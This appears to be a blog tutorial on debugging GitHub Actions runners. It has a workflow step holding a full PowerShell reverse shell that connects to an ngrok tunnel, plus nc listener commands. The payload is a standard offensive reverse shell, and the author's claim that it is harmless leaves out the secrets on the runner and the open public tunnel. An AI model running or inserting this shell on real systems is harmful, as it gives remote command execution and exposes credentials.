Debugging GitHub Actions on Hosted Runners

Sat, Sep 11, 2021 4-minute read

If you have worked with CI/CD tools like Azure Pipelines or GitHub Actions, I am sure you have run into situations where “it works on my machine, but not on the hosted runner/agent”. A pipeline rarely works on the first run, and when it does, it feels too good to be true. I find myself spending a lot of time troubleshooting pipelines/workflows until I get them right. Once I get them right, the journey from there is usually smooth. Do what hurts the most, often, right? And you will get better at it.

However, this troubleshooting can get really complicated, and there were many times I wished we had some tooling support to debug our pipelines. If you are using self-hosted runners, this is not so much of a problem because you have access to the runner environment. GitHub-hosted runners, however, make things a lot more complicated. They are short-lived, ephemeral VMs that are provisioned just for the pipeline run and destroyed soon after.

So, here’s a technique that lets you put a breakpoint in your workflow: when the workflow hits the breakpoint, you get a remote shell into the runner. Once you’ve got remote shell access, the possibilities are endless.

Client/Developer Machine Setup

All you need is a Linux machine with the nc utility. Netcat (nc) is a command-line tool for reading from and writing to raw network connections, which gives you a lot of flexibility with low-level streams. If you are on Windows, WSL2 should work as well. Here are the steps:

  1. Install the ngrok utility
    If you haven’t used ngrok before, refer to the ngrok download instructions to get it. It’s a simple utility that exposes a local port through a tunnel at an internet-accessible endpoint. You may also need to set up an authtoken so that you can forward raw TCP connections.

  2. Forward a local port with ngrok
    We are going to use nc to listen on a local port and receive a reverse shell from the runner. So, run the following in a new terminal to forward local port 443 with ngrok:

    ./ngrok tcp 443

    Note the remote server name and port that ngrok reports on its Forwarding line (as in the example below), because you will need them later:

    Forwarding                    tcp://x.tcp.ngrok.io:12345 -> localhost:443

  3. Listen on 443 for the reverse shell
    In a new terminal window, use nc to listen on port 443 for the reverse shell connection from the hosted runner. On Linux, binding to a port below 1024 normally requires root, so you may need to prefix the command with sudo.
    nc -lvp 443
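
If you would rather not copy the remote server name and port by hand, the Forwarding line from step 2 can be split with plain shell string operations. This is only a minimal sketch: parse_ngrok_forwarding, NGROK_HOST and NGROK_PORT are names made up for this example (they are not part of ngrok), and it assumes the line has the same tcp://host:port shape as the sample output above.

```shell
# Hypothetical helper (not part of ngrok): print "host port" for a line like
#   Forwarding   tcp://x.tcp.ngrok.io:12345 -> localhost:443
# The body runs in a subshell ( ... ) so its variables do not leak out.
parse_ngrok_forwarding() (
  line="$1"
  # Drop everything up to and including the first "tcp://".
  endpoint="${line#*tcp://}"
  # Drop everything from the first space onwards, leaving "host:port".
  endpoint="${endpoint%% *}"
  # Split "host:port" at the last colon.
  host="${endpoint%:*}"
  port="${endpoint##*:}"
  printf '%s %s\n' "$host" "$port"
)

# Example with the sample line from step 2.
result=$(parse_ngrok_forwarding 'Forwarding                    tcp://x.tcp.ngrok.io:12345 -> localhost:443')
NGROK_HOST="${result% *}"
NGROK_PORT="${result#* }"
echo "host=$NGROK_HOST port=$NGROK_PORT"
# prints: host=x.tcp.ngrok.io port=12345
```

The two values are the ones that go into the <ngrok-remote-name> and <ngrok-remote-port> placeholders of the workflow step.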

Breakpoint on the workflow/pipeline

We call it a breakpoint, but it’s really a PowerShell step that pauses the workflow and initiates the reverse shell connection. Include the step below anywhere in your workflow where you would like it to pause. Be sure to replace <ngrok-remote-name> and <ngrok-remote-port> with the remote server name and port reported by the ngrok command in step 2.

  - name: reverse shell
    run: |
      # Connect back to the nc listener through the ngrok TCP endpoint.
      $client = New-Object System.Net.Sockets.TCPClient('<ngrok-remote-name>', <ngrok-remote-port>)
      $stream = $client.GetStream()
      [byte[]]$bytes = 0..65535 | % { 0 }
      # Read a command, run it, and send back its output plus a prompt.
      # The loop ends when the listener disconnects (Read returns 0).
      while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
        $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
        $sendback = (iex $data 2>&1 | Out-String)
        $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
        $stream.Write($sendbyte, 0, $sendbyte.Length)
        $stream.Flush()
      }
      $client.Close()
    shell: pwsh

That’s it. Run the workflow and you will notice that it pauses at the ‘reverse shell’ step. It may not be obvious, because no prompt appears until you run the first command, but the terminal window where you ran nc now holds a reverse shell into the hosted runner. Type ls in that terminal and press Enter, and you will see the output from the runner. You now have a shell for any troubleshooting you may want to do. Once you are done, exit nc (for example, with Ctrl+C) and the workflow will resume.

Did we just hack the hosted runner?

Yes and no. If you run that PowerShell snippet on your own Windows machine, Defender will block it and report that it prevented malicious code. Besides, anyone with a decent understanding of security would freak out when they hear the term “reverse shell”. Yes, it is a hacking technique, but in our situation it’s a completely harmless use, if you know how runners/agents work. GitHub Actions runners and Azure Pipelines agents are short-lived VMs created just for you, just for the duration of that pipeline run. So, you are allowed to run arbitrary code there, which is probably why Defender is not running there in the first place. So, no, we didn’t hack into the runner, because it’s a complete sandbox dedicated to my pipeline run.

Although the above mostly talks about GitHub Actions, the technique works for Azure Pipelines as well. Hope this helps.

Similar Solutions:

  • Debugging with tmate Action: Looks simple enough, but relies on tmate, which is similar to the ngrok+nc combination.
  • Debug via SSH Action: Instead of a reverse shell, it seems to use SSH forwarding. I was unsure whether it works on Windows runners, but the action claims that it does.